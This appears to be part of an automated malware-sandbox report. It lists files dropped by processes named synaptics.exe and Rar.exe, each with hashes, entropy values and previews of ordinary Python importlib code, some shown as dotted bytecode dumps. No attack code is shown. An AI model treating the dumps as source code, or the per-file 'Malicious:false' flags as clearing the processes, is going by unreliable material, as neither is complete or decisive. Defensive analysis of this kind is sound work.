                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...e.e.j.e.f...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.e.j.d.e.j.d...d.d.....Z.e.j.d.d.....Z.e...e.j...e.j.d.d.......Z d.S.)......N)...Union..Any..Optional.....)...ResourceReader..Traversable)...wrap_specc....................C...s....t.t.|.....S.).z3. Get a Traversable resource from a package. )...from_package..get_package)...package..r.....5C:\Users\Public\QExvbmVOb25l\lib\importlib\_common.py..files....s......r....c....................C...s....t.|...}.t.j...|...\.}.}.|.r.t.|...d.......|.S.).z.Normalize a path by ensuring it is a string... If the resulting string contains path separators, an exception is raised.. z. must be only a file name)...str..os..path..split..ValueError).r....Z.str_path..parent..file_namer....r....r......normalize_path....s..............r....c....................C...s*...|.j.}.t.|.j.d.d...}.|.d.u
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):15904
                                                                                                                                                                                      Entropy (8bit):5.108311815005808
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:Ez1B5HGaViuYo8vEVbFCibM/50LbCb1EVMXS6O9PzXDPJ8OoEAuDdPTaX/DOWP6s:EVDVnR8gC/50LbjVMA9PrWCDaX/P6s
                                                                                                                                                                                      MD5:6EB15404384F6EB937E5F4A25BAE639C
                                                                                                                                                                                      SHA1:1CC389C0B2D905402C54AAB677142BBA304FE963
                                                                                                                                                                                      SHA-256:B33CBA19B287E279540EA3D50945DFFF24C1117EE08CA53F7B3C49839C6252DC
                                                                                                                                                                                      SHA-512:7CCF4B0A9FC3C3EA346FF51FB14755C78E49252DBA670FD60A359132A9E5C5EC1B431A8E3F849AB7792B895211C5AEE53EF2AC00F386EFCE750A45315EDD3871
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.:.......................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...z.d.d.l.Z.W.n...e.y...Z...z.e.j.d.k.r"..d.Z.W.Y.d.Z.[.n.d.Z.[.w.w.z.d.d.l.Z.W.n...e.y@......e.Z.Y.n.w.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d...Z.G.d.d...d.e.j.d...Z.G.d.d...d.e.j.d...Z.e.e.e.j.e.j.e.j.e.j.....G.d.d...d.e.j.d...Z.e.e.e.j.....G.d.d...d.e...Z.G.d.d...d.e...Z.e.e.e.j.e.j.....G.d.d...d.e...Z.e.e.e.j ....G.d.d...d.e.j!e.e...Z!e.e!e.j"e.j#....G.d.d...d.e.j$e.e...Z$e.e$e.j"....G.d.d...d.e.j.d...Z%e.G.d.d ..d e.....Z&G.d!d"..d"e%..Z'd.S.)#z(Abstract base classes related to import......)..._bootstrap_external)...machinery.....N.._frozen_importlib)...Loader)...BinaryIO..Iterable..Text)...Protocol..runtime_checkablec....................G...sZ...|.D.](}.|...|.....t.d.u.r*z.t.t.|.j...}.W.n...t.y$......t.t.|.j...}.Y.n.w.|...|.....q.d.S...N)...registerr......getattr..__name__..AttributeError.._frozen_importlib_external).Z.abstract_clsZ.classes..clsZ.frozen_cls..r.....1C:\Users\Public
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):957
                                                                                                                                                                                      Entropy (8bit):5.425235583484172
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:12:C2kBAzUYcjBN/8XHmE16iGMwigQFM4u0LIX7OujdiXg8G94OlWRXqnrmHO28sVtP:UjoXT16iGMJgQFpAquj8G/OXsrmH58K
                                                                                                                                                                                      MD5:DA06D21DDC1EAC2CA61D3875E276E0E6
                                                                                                                                                                                      SHA1:FB8AC8D021A8BF74412C54D957ECFE7AF37D3415
                                                                                                                                                                                      SHA-256:7703B4740A0600C45643AD3956896BAF39F83392015D2AC0ADE3782E674115C2
                                                                                                                                                                                      SHA-512:193296CBD3645BDF6FE1B80BFE936782F65D1FC3D12C322D4F44BA3652740C155E098FB490CB919E81E21442171A3EB87689CD245D350D5C542219409ED18335
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-dR........................@...s....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d...Z.d.S.).z9The machinery of importlib: finders, loaders, hooks, etc......)...ModuleSpec)...BuiltinImporter)...FrozenImporter)...SOURCE_SUFFIXES..DEBUG_BYTECODE_SUFFIXES..OPTIMIZED_BYTECODE_SUFFIXES..BYTECODE_SUFFIXES..EXTENSION_SUFFIXES)...WindowsRegistryFinder)...PathFinder)...FileFinder)...SourceFileLoader)...SourcelessFileLoader)...ExtensionFileLoaderc....................C...s....t.t...t...S.).zAReturns a list of all recognized module suffixes for this process).r....r....r......r....r.....7C:\Users\Public\QExvbmVOb25l\lib\importlib\machinery.py..all_suffixes....s......r....N)...__doc__.._bootstrapr....r....r......_bootstrap_externalr....r....r....r....r....r....r....r....r....r....r....r....r....r....r....r......<module>....s............................
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5195
                                                                                                                                                                                      Entropy (8bit):4.878952110496418
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:yPv9CoTQ1zsquRgowzdmCbBavWMPTjTzKuhXBoPTl906kEt7IQ7ClEXsjMptAWrD:sQ1ztyvedlbB7IruuhXBoPTlK9EhIQOi
                                                                                                                                                                                      MD5:76BB53375638FFA69573474BA7051154
                                                                                                                                                                                      SHA1:4CCF8855DAF5E80016B6EC6BCD75FFCA2677E1CC
                                                                                                                                                                                      SHA-256:C9540B4776B6CE764F16245863BE26AC0EC4A558D60048085726DCA64290661E
                                                                                                                                                                                      SHA-512:1BC1149475DDA1B60C855997DAA897FDFAF12D9FECE033F23783EAEAF003FE863EC1909F9037D383716D756AAD97852D13E0A3D841CD78610C8CCC2D5A6A379E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d~........................@...sx...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.G.d.d...d.e.j...Z.d.S.)......N.....)...abcc....................C...s....t.t.j...|.....S...N)...iter..collections..OrderedDict..fromkeys)...items..r.....5C:\Users\Public\QExvbmVOb25l\lib\importlib\readers.py..remove_duplicates...........r....c....................@....$...e.Z.d.Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...FileReaderc....................C...s....t...|.j...j.|._.d.S.r....)...pathlib..Path..path..parent)...self..loaderr....r....r......__init__....s......z.FileReader.__init__c....................C........t.|.j...|.....S...z{. Return the file system path to prevent. `resources.path()` from creating a temporary. copy.. ....strr......joinpath..r......resourcer....r....r......resource_path...........z.FileReader.resource_pathc....................C........|.j.S.r......r......r....r....r....r......files...........z.FileRea
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):5382
                                                                                                                                                                                      Entropy (8bit):5.3427306086604975
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:ozYSudPIqJNGeMzW9dlfxVf0JJgFGx6qjBfjO6y3SnKL49oNhbMrhKgTlv:oJBnS9xVfSJgGx6AjI3SKyhRTlv
                                                                                                                                                                                      MD5:355B8ACC990EB8BDB7DE27B48CE71264
                                                                                                                                                                                      SHA1:B038521CD40697D8FBB1D41CB6E2EAFA971347ED
                                                                                                                                                                                      SHA-256:E9DC0D672BC1EEF054731F8934870B61BEB1017E90DE2612C0F06FFA7638FEF3
                                                                                                                                                                                      SHA-512:8A90CAAE1973D8340F6F1F799D5A0D6C457E42FBEA782374EA524D435F166D9A69467ED80DE6CB49A6AFE7F652F98247ABDF5F9299FB2110D3699930728732B3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...g.d...Z e.e!e.f...Z"e.e!e.j#f...Z$d.e"d.e$d.e.f.d.d...Z%....d3d.e"d.e$d.e!d.e!d.e.f.d.d...Z&d.e"d.e$d.e'f.d.d...Z(....d3d.e"d.e$d.e!d.e!d.e!f.d.d ..Z)d.e"d.e$d.d!f.d"d#..Z*d$d%..Z+d&d'..Z,d(d)..Z-d.e"d*e!d.e.f.d+d,..Z/d.e"d.e.e!..f.d-d...Z0e.d/d0....Z1e1.2e...d1d2....Z3d.S.)4.....N.....)..._common)...as_file..files)...ResourceReader)...suppress)...ResourceLoader)...ModuleSpec)...BytesIO..TextIOWrapper)...Path)...ModuleType)...ContextManager..Iterable..Union)...cast)...BinaryIO..TextIO)...Sequence)...singledispatch)...Package..Resourcer....r......contentsr......is_resource..open_binary..open_text..path..read_binary..read_text..package..resource..returnc....................C...s&...t...|...}.t...|...}.t...|...}.|.d.u.r.|...|...S.t.t.|.j...}.|
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9342
                                                                                                                                                                                      Entropy (8bit):5.320515236210884
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:TptTll1YVqQzvbab+Q3+LbcwE5lFz0w7/RhZT:Fbl1YVqoeb+QuLbpmFz06RhZT
                                                                                                                                                                                      MD5:7DCA14AE783831BBD4B26FD6739B9A07
                                                                                                                                                                                      SHA1:B36C9646AF55A5D70DAF83C497064E1F319AA5AB
                                                                                                                                                                                      SHA-256:36CB19B2B54EF2381D6B12CF683D50E36C7FB65F540E72FA910E756F79C13C8A
                                                                                                                                                                                      SHA-512:BB9711DCDE240D30A124D98D6968D9E9ED78E399AF29CFD76B32FAE07D8568208A51DE4E602CE377649C0D4125D3355F47E2823F640ED66A0B2E4F9C50E9F42B
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:o........'-d.........................@...s*...d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d...Z.d.d...Z.d$d.d...Z.d$d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.G.d d!..d!e.j...Z.G.d"d#..d#e...Z d.S.)%z-Utility code for constructing importers, etc......)...Loader)...module_from_spec)..._resolve_name)...spec_from_loader)..._find_spec)...MAGIC_NUMBER)..._RAW_MAGIC_NUMBER)...cache_from_source)...decode_source)...source_from_cache)...spec_from_file_location.....)...contextmanagerNc....................C...s....t...t.|...S.).zBReturn the hash of *source_bytes* as used in hash-based pyc files.)..._imp..source_hashr....)...source_bytes..r.....2C:\Users\Public\QExvbmVOb25l\lib\importlib\util.pyr........s......r....c....................C...s\...|...d...s.|.S.|.s.t.d.t.|.....d.......d.}.|.D.].}.|.d.k.r...n.|.d.7.}.q.t.|.|.d.....|.|...S.).z2Resolve a rela
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1906
                                                                                                                                                                                      Entropy (8bit):4.433036910849268
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:7+Sd1gyYp8ImdaCtl27fisRiqITfqF6BSES5C+LOqqc8vbBLlZvI/iWnWuPQ:CS0207fisQqgqF2SEqxStLlhIqWW
                                                                                                                                                                                      MD5:CBCCC8E431A338F393CCD4D3F244CCC5
                                                                                                                                                                                      SHA1:77FF0ADCB6F35D675030BEC62BB55AA076692037
                                                                                                                                                                                      SHA-256:C4376232DA9464A27B02A530473489486D570F25A063715F3AD5A24D92FFE527
                                                                                                                                                                                      SHA-512:27F28525A50F068F9327613AE5A71FAE25984292ED9CDEDF92B93E9DE4E00E8121BD397E34C7E728E5849289285677ED88C43F6AB6EFB60DA36331E9C2E6CC0C
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Subset of importlib.abc used to reduce importlib.util imports."""..from . import _bootstrap..import abc..import warnings......class Loader(metaclass=abc.ABCMeta):.... """Abstract base class for import loaders.""".... def create_module(self, spec):.. """Return a module to initialize and into which to load..... This method should raise ImportError if anything prevents it.. from creating a new module. It may return None to indicate.. that the spec should create the new module... """.. # By default, defer to default semantics for the new module... return None.... # We don't define exec_module() here since that would break.. # hasattr checks we do to support backward compatibility..... def load_module(self, fullname):.. """Return the loaded module..... The module must be added to sys.modules and have import-related.. attributes set properly. The fullname is a str..... ImportError is raised on fa
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):1991
                                                                                                                                                                                      Entropy (8bit):4.390505646801514
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:0i644hrdO2kdSNH1UKetWEeF6kKznFEjRWOem++bPnn3kVqf:B644hrU2kwDL16kGCVWOHNznMqf
                                                                                                                                                                                      MD5:5C775988B17A8E77726D985B2FE1284C
                                                                                                                                                                                      SHA1:DC9FA37CDF9F1EC1045B16BEE536C1D54C488539
                                                                                                                                                                                      SHA-256:F338A91DEEF0B819B408D7BAEA338D637B817A69B3270A6608ACF79EF9ED700A
                                                                                                                                                                                      SHA-512:A88F3248FA18787B4D98F50EADC5DED6AC4D7B09A8B618C1CE8D440A3FC2B28B8DE00AAAE8338840549C77F92E01F6D12F02C4940FD350BC96EE2AE041E12DCA
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:from contextlib import suppress....from . import abc......class SpecLoaderAdapter:.. """.. Adapt a package spec to adapt the underlying loader... """.... def __init__(self, spec, adapter=lambda spec: spec.loader):.. self.spec = spec.. self.loader = adapter(spec).... def __getattr__(self, name):.. return getattr(self.spec, name)......class TraversableResourcesLoader:.. """.. Adapt a loader to provide TraversableResources... """.... def __init__(self, spec):.. self.spec = spec.... def get_resource_reader(self, name):.. return DegenerateFiles(self.spec)._native()......class DegenerateFiles:.. """.. Adapter for an existing or non-existant resource reader.. to provide a degenerate .files()... """.... class Path(abc.Traversable):.. def iterdir(self):.. return iter(()).... def is_dir(self):.. return False.... is_file = exists = is_dir # type: ignore.... def joinpa
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):42676
                                                                                                                                                                                      Entropy (8bit):4.491854158137825
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:1eKvy2ADZIwUMAfvkUFlXppkl89q/5R5B/miJ5j2:DDCUdfvkUC72
                                                                                                                                                                                      MD5:03A827AAC6D6D4EBEA01D384EAA30F32
                                                                                                                                                                                      SHA1:81ADE09B0AEADF4B2721F56BE11E75E453192B45
                                                                                                                                                                                      SHA-256:B300CE18C15FD539F099883AEDC24B1A91E5C35B581EFDBB9E21D638A4EC82E5
                                                                                                                                                                                      SHA-512:B0B3BA998638A3CF0C8A8DF4D9B678FBF4D92AC387064151A6D7DF3179103CC5B4C417146CEF6D3E1120658672807AA89BC92867DF7A7C7022DD26A6FF361A80
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Core implementation of import.....This module is NOT meant to be directly imported! It has been designed such..that it can be bootstrapped into Python as the implementation of import. As..such it requires the injection of specific modules and attributes in order to..work. One should use importlib as the public-facing version of this module....."""..#..# IMPORTANT: Whenever making changes to this module, be sure to run a top-level..# `make regen-importlib` followed by `make` in order to get the frozen version..# of the module updated. Not doing so will result in the Makefile to fail for..# all others who don't have a ./python around to freeze the module..# in the early stages of compilation...#....# See importlib._setup() for what is injected into the global namespace.....# When editing this code be aware that code executed at import time CANNOT..# reference any injected objects! This includes not only global code but also..# anything specified at the class level.....def _object_name
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):66536
                                                                                                                                                                                      Entropy (8bit):4.677552891760068
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:iKsoAmFqJ4QFhE/tn5k0feP1tO4o4MCxl6knccZ/76RlgSHvflx3ov:txc4QF8tn5yM4B6kccZzILP+
                                                                                                                                                                                      MD5:B6ED9264CB6BA04A6F439723C05F3072
                                                                                                                                                                                      SHA1:0B8B9604896114FE1F5FB76087BAADCFED21D334
                                                                                                                                                                                      SHA-256:CD9B77650B59135A764C6A536151673D4130BD88C9171223376D19CE5B971B77
                                                                                                                                                                                      SHA-512:384439A20C07A730CFB4E8DAB9793D726157DF2760A3D4A6C95C3F9E02DEC52EF1FCB500D1CC9E5386D705FAB4091F4EBA2848BD2055F51D7F7F44C7DB66C084
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Core implementation of path-based import.....This module is NOT meant to be directly imported! It has been designed such..that it can be bootstrapped into Python as the implementation of import. As..such it requires the injection of specific modules and attributes in order to..work. One should use importlib as the public-facing version of this module....."""..# IMPORTANT: Whenever making changes to this module, be sure to run a top-level..# `make regen-importlib` followed by `make` in order to get the frozen version..# of the module updated. Not doing so will result in the Makefile to fail for..# all others who don't have a ./python around to freeze the module in the early..# stages of compilation...#....# See importlib._setup() for what is injected into the global namespace.....# When editing this code be aware that code executed at import time CANNOT..# reference any injected objects! This includes not only global code but also..# anything specified at the class level.....# Module
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):3340
                                                                                                                                                                                      Entropy (8bit):4.6745746844172285
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:C15GjAcQmz/EgZIyHf4Dd2juC6cO2HEzIX9SkqR8E:CowI/VLf452t6aHEzIX9S1R8E
                                                                                                                                                                                      MD5:97023E935E8C794384CC5651D2A64F28
                                                                                                                                                                                      SHA1:67B8407421BC914FDEC799FF161D4131454ED372
                                                                                                                                                                                      SHA-256:F2ED6530F455FA56E1BCF69BB85553D72B2013933624533AFA69A874EB67AE00
                                                                                                                                                                                      SHA-512:A0B82EF0EAA82D2F91763648086EE4046D7149BC2E3FA3A34A52A381CE8CD9BEBA5DBADBE71A9BFA012B239B849F403B092D3B0A90F542C6D0CEBD3D603804C4
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import pathlib..import tempfile..import functools..import contextlib..import types..import importlib....from typing import Union, Any, Optional..from .abc import ResourceReader, Traversable....from ._adapters import wrap_spec....Package = Union[types.ModuleType, str]......def files(package):.. # type: (Package) -> Traversable.. """.. Get a Traversable resource from a package.. """.. return from_package(get_package(package))......def normalize_path(path):.. # type: (Any) -> str.. """Normalize a path by ensuring it is a string..... If the resulting string contains path separators, an exception is raised... """.. str_path = str(path).. parent, file_name = os.path.split(str_path).. if parent:.. raise ValueError(f'{path!r} must be only a file name').. return file_name......def get_resource_reader(package):.. # type: (types.ModuleType) -> Optional[ResourceReader].. """.. Return the package's loader if it's a ResourceReader...
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):14863
                                                                                                                                                                                      Entropy (8bit):4.500827376021012
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:JL/+/DsHY+mmxtRIE8O1gIjyyroF8M1470fY7GTDHv+RI+oe+:RGMY+mg9dyqMw7Esu
                                                                                                                                                                                      MD5:1C219A984C22F7CEFDF4658FF6F7717A
                                                                                                                                                                                      SHA1:C4C4B39D02F10989A0256612C59E8E35B808D99C
                                                                                                                                                                                      SHA-256:03060C6B437D5268556E45EC50A89B25FF2DBBB393695611046BE776233BD568
                                                                                                                                                                                      SHA-512:EEEA7E1582181A408A34F2BA2B6AA8ABCFDFC37C86ABF109CBD6233FEF68FB65724659857F426D41DA50D48B36E81D736BF5E16CC8FFFEF55F7EF628634BB4BD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""Abstract base classes related to import."""..from . import _bootstrap_external..from . import machinery..try:.. import _frozen_importlib..except ImportError as exc:.. if exc.name != '_frozen_importlib':.. raise.. _frozen_importlib = None..try:.. import _frozen_importlib_external..except ImportError:.. _frozen_importlib_external = _bootstrap_external..from ._abc import Loader..import abc..import warnings..from typing import BinaryIO, Iterable, Text..from typing import Protocol, runtime_checkable......def _register(abstract_cls, *classes):.. for cls in classes:.. abstract_cls.register(cls).. if _frozen_importlib is not None:.. try:.. frozen_cls = getattr(_frozen_importlib, cls.__name__).. except AttributeError:.. frozen_cls = getattr(_frozen_importlib_external, cls.__name__).. abstract_cls.register(frozen_cls)......class Finder(metaclass=abc.ABCMeta):.... """Legacy abstract base cl
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):850
                                                                                                                                                                                      Entropy (8bit):4.966782780310052
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:24:YT166asGSaopamPQpaJ2XEaJ2QaJLYaJRaJnaJiaJen5Jir:2VGSD0y20y2QyLYyRynyiy25Jir
                                                                                                                                                                                      MD5:AC4151821693C881CEF5C5567EE36977
                                                                                                                                                                                      SHA1:98C415AF4EECD5832ACD4DCA3FE2DBC220CE4B02
                                                                                                                                                                                      SHA-256:1B8C62B3A0494C064B37D1812F3A67A475B874A383C937665C6DD66FCDC8F7B1
                                                                                                                                                                                      SHA-512:1F2E8AA728F1EFF0A7AAE5D6B574D91CF3724BC49D5B4AEEB2E3CB53BD997A92A2E9C5CDBC5ACC052D5F0EA96FBF2626509C23E6E8BCC8183140D5FFD09070FD
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:"""The machinery of importlib: finders, loaders, hooks, etc."""....from ._bootstrap import ModuleSpec..from ._bootstrap import BuiltinImporter..from ._bootstrap import FrozenImporter..from ._bootstrap_external import (SOURCE_SUFFIXES, DEBUG_BYTECODE_SUFFIXES,.. OPTIMIZED_BYTECODE_SUFFIXES, BYTECODE_SUFFIXES,.. EXTENSION_SUFFIXES)..from ._bootstrap_external import WindowsRegistryFinder..from ._bootstrap_external import PathFinder..from ._bootstrap_external import FileFinder..from ._bootstrap_external import SourceFileLoader..from ._bootstrap_external import SourcelessFileLoader..from ._bootstrap_external import ExtensionFileLoader......def all_suffixes():.. """Returns a list of all recognized module suffixes for this process""".. return SOURCE_SUFFIXES + BYTECODE_SUFFIXES + EXTENSION_SUFFIXES..
                                                                                                                                                                                      Process:C:\Users\user\Downloads\A vide k s k pek gyujtem nye szerzoi jogv delem alatt ll a szerzo ltal\Documents\Rar.exe
                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):31653
                                                                                                                                                                                      Entropy (8bit):4.600545092713191
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:384:LAYScdWiMmMXy0TgP/eBSebWeLYfu51vlAB51Hvd8WgT0Tt/B7GFn6+hwYgEm+Z:LPSVmMXy4g0H1vAvvdm4rSPwybZ
                                                                                                                                                                                      MD5:A6634294230146390C6551589BE95CD7
                                                                                                                                                                                      SHA1:D6A8337B5227634D41CF53E735DF749C3C531166
                                                                                                                                                                                      SHA-256:306A3AD3820533FDE313CBEA0BB8840D5DEF6455D16F39F76D6B9CDA91918DEE
                                                                                                                                                                                      SHA-512:2A8533F9AE86CB520015F0426C28727857912D6CC253A4BEBCC64AC51B91CB9D4A4624807D29ABF2F20ADFE14ACAA61F7BC47EAECD301230515129AF694207BE
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview:import os..import re..import abc..import csv..import sys..import email..import pathlib..import zipfile..import operator..import textwrap..import warnings..import functools..import itertools..import posixpath..import collections....from . import _adapters, _meta..from ._meta import PackageMetadata..from ._collections import FreezableDefaultDict, Pair..from ._functools import method_cache, pass_none..from ._itertools import unique_everseen..from ._meta import PackageMetadata, SimplePath....from contextlib import suppress..from importlib import import_module..from importlib.abc import MetaPathFinder..from itertools import starmap..from typing import List, Mapping, Optional, Union......__all__ = [.. 'Distribution',.. 'DistributionFinder',.. 'PackageMetadata',.. 'PackageNotFoundError',.. 'distribution',.. 'distributions',.. 'entry_points',.. 'files',.. 'metadata',.. 'packages_distributions',.. 'requires',.. 'version',..]......class PackageNotFoundError(Mo
                                                                                                                                                                                      Process:C:\Users\Public\QExvbmVOb25l\synaptics.exe
                                                                                                                                                                                      File Type:data
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):37109
                                                                                                                                                                                      Entropy (8bit):5.211135547824197
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:768:uBMjZ3JEQWRwd2Aj+j5El+bA16p34b50nOlt8/:uBcAL9iGzo+Ol2/
                                                                                                                                                                                      MD5:706FA61D17268A4091EDE182B4E3A133
                                                                                                                                                                                      SHA1:77A232EB856F6A0E9D196CCB73DF87BF42857E36
                                                                                                                                                                                      SHA-256:A64D2B6721E76F9BF16DF684B075DC951341C481E3D58D8E97B8285CFA8EA312
                                                                                                                                                                                      SHA-512:05B1763589211ACA3E2B89D2A3E8C911DADF23718F6E75631096FB527E3DB2CF8DC22A2400EC19B05AD12DC0C774CD734B88250F97D702960EBF1BFADCA53973
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
